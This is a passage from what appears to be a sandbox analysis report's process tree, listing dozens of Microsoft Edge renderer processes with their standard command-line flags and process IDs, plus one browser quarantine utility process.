  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7444 /prefetch:1
  2⤵
  PID:2112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1
  2⤵
  PID:2356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
  2⤵
  PID:3244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7776 /prefetch:1
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7784 /prefetch:1
  2⤵
  PID:336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7988 /prefetch:1
  2⤵
  PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8168 /prefetch:1
  2⤵
  PID:3248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8440 /prefetch:1
  2⤵
  PID:5264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8548 /prefetch:1
  2⤵
  PID:5340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8696 /prefetch:1
  2⤵
  PID:5352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8836 /prefetch:1
  2⤵
  PID:5360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9184 /prefetch:1
  2⤵
  PID:5528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9356 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7852 /prefetch:1
  2⤵
  PID:6000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8380 /prefetch:1
  2⤵
  PID:6080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8188 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8348 /prefetch:1
  2⤵
  PID:5680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8572 /prefetch:1
  2⤵
  PID:5704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1
  2⤵
  PID:1484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
  2⤵
  PID:5916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9496 /prefetch:1
  2⤵
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8100 /prefetch:1
  2⤵
  PID:4812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8088 /prefetch:1
  2⤵
  PID:2676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
  2⤵
  PID:240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
  2⤵
  PID:1204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8996 /prefetch:1
  2⤵
  PID:4328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:1
  2⤵
  PID:5464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
  2⤵
  PID:5360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:6012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8292 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7712 /prefetch:1
  2⤵
  PID:5860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7408 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8468 /prefetch:1
  2⤵
  PID:3768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:3496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6836 /prefetch:1
  2⤵
  PID:5940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8056 /prefetch:1
  2⤵
  PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8824 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9028 /prefetch:1
  2⤵
  PID:5380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9176 /prefetch:1
  2⤵
  PID:5544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8576 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
  2⤵
  PID:1872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7860 /prefetch:1
  2⤵
  PID:5664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
  2⤵
  PID:3728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
  2⤵
  PID:884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
  2⤵
  PID:1664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1
  2⤵
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9548 /prefetch:1
  2⤵
  PID:5972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9700 /prefetch:1
  2⤵
  PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8796 /prefetch:1
  2⤵
  PID:4780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:1
  2⤵
  PID:932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7208 /prefetch:1
  2⤵
  PID:5724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9008 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:1
  2⤵
  PID:3728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
  2⤵
  PID:5308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8544 /prefetch:1
  2⤵
  PID:5388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10304 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
  2⤵
  PID:4488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1988 /prefetch:1
  2⤵
  PID:4364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10276 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9980 /prefetch:1
  2⤵
  PID:1312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10508 /prefetch:1
  2⤵
  PID:6180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9408 /prefetch:1
  2⤵
  PID:6428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10340 /prefetch:1
  2⤵
  PID:6748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
